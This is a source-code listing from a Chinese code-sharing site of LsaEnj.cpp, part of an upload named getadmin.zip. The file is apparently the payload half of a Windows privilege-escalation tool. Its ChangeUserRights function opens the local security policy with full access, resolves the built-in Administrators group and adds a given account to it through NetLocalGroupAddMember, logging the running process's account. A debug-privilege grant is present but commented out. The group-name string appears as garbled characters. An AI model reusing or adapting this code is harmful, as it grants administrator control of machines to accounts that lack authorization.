开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 查看源码
LsaEnj.cpp
资源名称:getadmin.zip [点击查看]
上传用户:yihongxs01
上传日期:2007-01-05
资源大小:48k
文件大小:11k
源码类别:

系统/网络安全

开发平台:

WINDOWS

LsaEnj.cpp:源码内容
  2. #ifndef UNICODE
  3. #define UNICODE
  4. #endif // UNICODE
  5.  
  6. #include <windows.h>
  7.  
  8. #include "ntsecapi.h"
  9. #include <lmaccess.h>
  13. void LogA(LPSTR strA);
  15. void LogW(LPTSTR strW)
  16. {
  17. char strA[256];
  18. wcstombs(strA,strW,wcslen(strW));
  19. LogA(strA);
  20. }
  23.  
  24. NTSTATUS
  25. OpenPolicy(
  26.     LPWSTR ServerName,          // machine to open policy on (Unicode)
  27.     DWORD DesiredAccess,        // desired access to policy
  28.     PLSA_HANDLE PolicyHandle    // resultant policy handle
  29.     );
  30.  
  31. BOOL
  32. GetAccountSid(
  33.     LPTSTR SystemName,          // where to lookup account
  34.     LPTSTR AccountName,         // account of interest
  35.     PSID *Sid                   // resultant buffer containing SID
  36.     );
  37.  
  38. NTSTATUS
  39. SetPrivilegeOnAccount(
  40.     LSA_HANDLE PolicyHandle,    // open policy handle
  41.     PSID AccountSid,            // SID to grant privilege to
  42.     LPWSTR PrivilegeName,       // privilege to grant (Unicode)
  43.     BOOL bEnable                // enable or disable
  44.     );
  45.  
  46. void
  47. InitLsaString(
  48.     PLSA_UNICODE_STRING LsaString, // destination
  49.     LPWSTR String                  // source (Unicode)
  50.     );
  51.  
  52. void
  53. DisplayNtStatus(
  54.     LPSTR szAPI,                // pointer to function name (ANSI)
  55.     NTSTATUS Status             // NTSTATUS error value
  56.     );
  57.  
  58. void
  59. DisplayWinError(
  60.     LPSTR szAPI,                // pointer to function name (ANSI)
  61.     DWORD WinError              // DWORD WinError
  62.     );
  65.  
  66. #define RTN_OK 0
  67. #define RTN_USAGE 1
  68. #define RTN_ERROR 13
  69.  
  70. //
  71. // If you have the ddk, include ntstatus.h.
  72. //
  73. #ifndef STATUS_SUCCESS
  74. #define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
  75. #endif
  76.  
  78. int ChangeUserRights(char* Account)
  79. {
  80.     LSA_HANDLE PolicyHandle;
  81.     WCHAR wComputerName[200]=L"";
  82.     WCHAR wGroupName[200]=L"冷扈龛耱疣蝾瘥";//L"Administrators";   
  84. WCHAR szAccountName[200];
  85. WCHAR szProcessAccountName[200];
  86. DWORD dwAccountSize = 200;
  87. LONG lAccountSize = 200;
  88. SID administrators;
  89. SID_IDENTIFIER_AUTHORITY  IdentifierAuthority= SECURITY_NT_AUTHORITY;
  90.     DWORD cbName = sizeof(wGroupName);
  91. WCHAR  ReferencedDomainName[255];
  92. DWORD  cbReferencedDomainName = 255; 
  93. SID_NAME_USE eUse;
  96.     PSID pSid;
  97.     NTSTATUS Status;
  98.     int iRetVal=RTN_ERROR;          
  100. administrators.IdentifierAuthority = IdentifierAuthority;
  101. administrators.SubAuthority[0] = SECURITY_BUILTIN_DOMAIN_RID;
  102. administrators.SubAuthority[1] = DOMAIN_GROUP_RID_ADMINS;
  103. administrators.Revision = 1;
  105.  
  108. mbstowcs(szAccountName,Account,strlen(Account));
  110. LogA("nChangeUserRight Begin");
  114. GetUserName(szProcessAccountName,&dwAccountSize);
  115. LogA("nProcess Account: ");
  116. LogW(szProcessAccountName);
  120. if(!wcslen(szAccountName)){
  121. LogA("nNo account");
  122. return 0;
  123. }
  125. LogA("nUserName:");
  126. LogW(szAccountName);
  127. LogA("n");
  130.         
  131.     //
  132.     // Open the policy on the target machine.
  133.     //
  134.     if((Status=OpenPolicy(
  135.                 wComputerName,      // target machine
  136.                 POLICY_ALL_ACCESS, //
  137.                 &PolicyHandle       // resultant policy handle
  138.                 )) != STATUS_SUCCESS) {
  139.         DisplayNtStatus("OpenPolicy", Status);
  140.         return RTN_ERROR;
  141.     }
  142.  
  144.     //
  145.     // Obtain the SID of the user/group.
  146.     // Note that we could target a specific machine, but we don't.
  147.     // Specifying NULL for target machine searches for the SID in the
  148.     // following order: well-known, Built-in and local, primary domain,
  149.     // trusted domains.
  150.     //
  151.     if(GetAccountSid(
  152.             NULL,       // default lookup logic
  153.             szAccountName,// account to obtain SID
  154.             &pSid       // buffer to allocate to contain resultant SID
  155.             )) {
  156.         //
  157.         // We only grant the privilege if we succeeded in obtaining the
  158.         // SID. We can actually add SIDs which cannot be looked up, but
  159.         // looking up the SID is a good sanity check which is suitable for
  160.         // most cases.
  161.  
  162.         //SE_SHUTDOWN_NAME
  164.         // Grant the SeServiceLogonRight to users represented by pSid.
  165.         //
  166. /*
  167.         if((Status=SetPrivilegeOnAccount(
  168.                     PolicyHandle,           // policy handle
  169.                     pSid,                   // SID to grant privilege
  170.                     L"SeDebugPrivilege", // Unicode privilege
  171.                     TRUE                    // enable the privilege
  172.                     )) == STATUS_SUCCESS)
  173.             iRetVal=RTN_OK;
  174.         else
  175.             DisplayNtStatus("AddUserRightToAccount", Status);
  176. */
  177.     }
  178.     else {
  179.         //
  180.         // Error obtaining SID.
  181.         //
  182.         DisplayWinError("GetAccountSid", GetLastError());
  183.     }
  187. if(!LookupAccountSid( 
  188. 0, 
  189. &administrators, 
  190. wGroupName, 
  191. &cbName, 
  192. ReferencedDomainName, 
  193. &cbReferencedDomainName, 
  194. &eUse 
  195. )) LogA("LookupAccountSid failedn");
  197. NetLocalGroupAddMember(0,wGroupName,pSid);
  199.  
  200.     //
  201.     // Close the policy handle.
  202.     //
  203.     LsaClose(PolicyHandle);
  204.  
  205.     //
  206.     // Free memory allocated for SID.
  207.     //
  208.     if(pSid != NULL) HeapFree(GetProcessHeap(), 0, pSid);
  209.  
  210.    
  211.     return iRetVal;
  212. }
  213.  
  214. void
  215. InitLsaString(
  216.     PLSA_UNICODE_STRING LsaString,
  217.     LPWSTR String
  218.     )
  219. {
  220.     DWORD StringLength;
  221.  
  222.     if (String == NULL) {
  223.         LsaString->Buffer = NULL;
  224.         LsaString->Length = 0;
  225.         LsaString->MaximumLength = 0;
  226.         return;
  227.     }
  228.  
  229.     StringLength = wcslen(String);
  230.     LsaString->Buffer = String;
  231.     LsaString->Length = (USHORT) StringLength * sizeof(WCHAR);
  232.     LsaString->MaximumLength=(USHORT)(StringLength+1) * sizeof(WCHAR);
  233. }
  234.  
  235. NTSTATUS
  236. OpenPolicy(
  237.     LPWSTR ServerName,
  238.     DWORD DesiredAccess,
  239.     PLSA_HANDLE PolicyHandle
  240.     )
  241. {
  242.     LSA_OBJECT_ATTRIBUTES ObjectAttributes;
  243.     LSA_UNICODE_STRING ServerString;
  244.     PLSA_UNICODE_STRING Server = NULL;
  245.  
  246.     //
  247.     // Always initialize the object attributes to all zeroes.
  248.     //
  249.     ZeroMemory(&ObjectAttributes, sizeof(ObjectAttributes));
  250.  
  251.     if (ServerName != NULL) {
  252.         //
  253.         // Make a LSA_UNICODE_STRING out of the LPWSTR passed in
  254.         //
  255.         InitLsaString(&ServerString, ServerName);
  256.         Server = &ServerString;
  257.     }
  258.  
  259.     //
  260.     // Attempt to open the policy.
  261.     //
  262.     return LsaOpenPolicy(
  263.                 Server,
  264.                 &ObjectAttributes,
  265.                 DesiredAccess,
  266.                 PolicyHandle
  267.                 );
  268. }
  269.  
  270.  
  271. BOOL
  272. GetAccountSid(
  273.     LPTSTR SystemName,
  274.     LPTSTR AccountName,
  275.     PSID *Sid
  276.     )
  277. {
  278.     LPTSTR ReferencedDomain=NULL;
  279.     DWORD cbSid=128;    // initial allocation attempt
  280.     DWORD cbReferencedDomain=16; // initial allocation size
  281.     SID_NAME_USE peUse;
  282.     BOOL bSuccess=FALSE; // assume this function will fail
  283.  
  284.     __try {
  285.  
  286.     //
  287.     // initial memory allocations
  288.     //
  289.     if((*Sid=HeapAlloc(
  290.                     GetProcessHeap(),
  291.                     0,
  292.                     cbSid
  293.                     )) == NULL) __leave;
  294.  
  295.     if((ReferencedDomain=(LPTSTR)HeapAlloc(
  296.                     GetProcessHeap(),
  297.                     0,
  298.                     cbReferencedDomain
  299.                     )) == NULL) __leave;
  300.  
  301.     //
  302.     // Obtain the SID of the specified account on the specified system.
  303.     //
  304.     while(!LookupAccountName(
  305.                     SystemName,         // machine to lookup account on
  306.                     AccountName,        // account to lookup
  307.                     *Sid,               // SID of interest
  308.                     &cbSid,             // size of SID
  309.                     ReferencedDomain,   // domain account was found on
  310.                     &cbReferencedDomain,
  311.                     &peUse
  312.                     )) {
  313.         if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
  314.             //
  315.             // reallocate memory
  316.             //
  317.             if((*Sid=HeapReAlloc(
  318.                         GetProcessHeap(),
  319.                         0,
  320.                         *Sid,
  321.                         cbSid
  322.                         )) == NULL) __leave;
  323.  
  324.             if((ReferencedDomain=(LPTSTR)HeapReAlloc(
  325.                         GetProcessHeap(),
  326.                         0,
  327.                         ReferencedDomain,
  328.                         cbReferencedDomain
  329.                         )) == NULL) __leave;
  330.         }
  331.         else __leave;
  332.     }
  333.  
  334.     //
  335.     // Indicate success.
  336.     //
  337.     bSuccess=TRUE;
  338.  
  339.     } // finally
  340.     __finally {
  341.  
  342.     //
  343.     // Cleanup and indicate failure, if appropriate.
  344.     //
  345.  
  346.     HeapFree(GetProcessHeap(), 0, ReferencedDomain);
  347.  
  348.     if(!bSuccess) {
  349.         if(*Sid != NULL) {
  350.             HeapFree(GetProcessHeap(), 0, *Sid);
  351.             *Sid = NULL;
  352.         }
  353.     }
  354.  
  355.     } // finally
  356.  
  357.     return bSuccess;
  358. }
  359.  
  360. NTSTATUS
  361. SetPrivilegeOnAccount(
  362.     LSA_HANDLE PolicyHandle,    // open policy handle
  363.     PSID AccountSid,            // SID to grant privilege to
  364.     LPWSTR PrivilegeName,       // privilege to grant (Unicode)
  365.     BOOL bEnable                // enable or disable
  366.     )
  367. {
  368.     LSA_UNICODE_STRING PrivilegeString;
  369.  
  370.     //
  371.     // Create a LSA_UNICODE_STRING for the privilege name.
  372.     //
  373.     InitLsaString(&PrivilegeString, PrivilegeName);
  374.  
  375.     //
  376.     // grant or revoke the privilege, accordingly
  377.     //
  378.     if(bEnable) {
  379.         return LsaAddAccountRights(
  380.                 PolicyHandle,       // open policy handle
  381.                 AccountSid,         // target SID
  382.                 &PrivilegeString,   // privileges
  383.                 1                   // privilege count
  384.                 );
  385.     }
  386.     else {
  387.         return LsaRemoveAccountRights(
  388.                 PolicyHandle,       // open policy handle
  389.                 AccountSid,         // target SID
  390.                 FALSE,              // do not disable all rights
  391.                 &PrivilegeString,   // privileges
  392.                 1                   // privilege count
  393.                 );
  394.     }
  395. }
  396.  
  397. void
  398. DisplayNtStatus(
  399.     LPSTR szAPI,
  400.     NTSTATUS Status
  401.     )
  402. {
  403.     //
  404.     // Convert the NTSTATUS to Winerror. Then call DisplayWinError().
  405.     //
  406.     DisplayWinError(szAPI, LsaNtStatusToWinError(Status));
  407. }
  408.  
  409. void
  410. DisplayWinError(
  411.     LPSTR szAPI,
  412.     DWORD WinError
  413.     )
  414. {
  415.     LPSTR MessageBuffer;
  416.     DWORD dwBufferLength;
  418.  
  419.     if(dwBufferLength=FormatMessageA(
  420.                         FORMAT_MESSAGE_ALLOCATE_BUFFER |
  421.                         FORMAT_MESSAGE_FROM_SYSTEM,
  422.                         NULL,
  423.                         WinError,
  424.                         GetUserDefaultLangID(),
  425.                         (LPSTR) &MessageBuffer,
  426.                         0,
  427.                         NULL
  428.                         ))
  429.     {
  430.  
  432.         //
  433.         // Output message string on stderr.
  434.         //
  435. /*
  436.         WriteFile(
  437.             GetStdHandle(STD_ERROR_HANDLE),
  438.             MessageBuffer,
  439.             dwBufferLength,
  440.             &dwBytesWritten,
  441.             NULL
  442.             );
  443. */
  444. MessageBuffer[dwBufferLength] =0;
  445. LogA(MessageBuffer);
  446.  
  447.         //
  448.         // Free the buffer allocated by the system.
  449.         //
  450.         LocalFree(MessageBuffer);
  451.     }
  453. }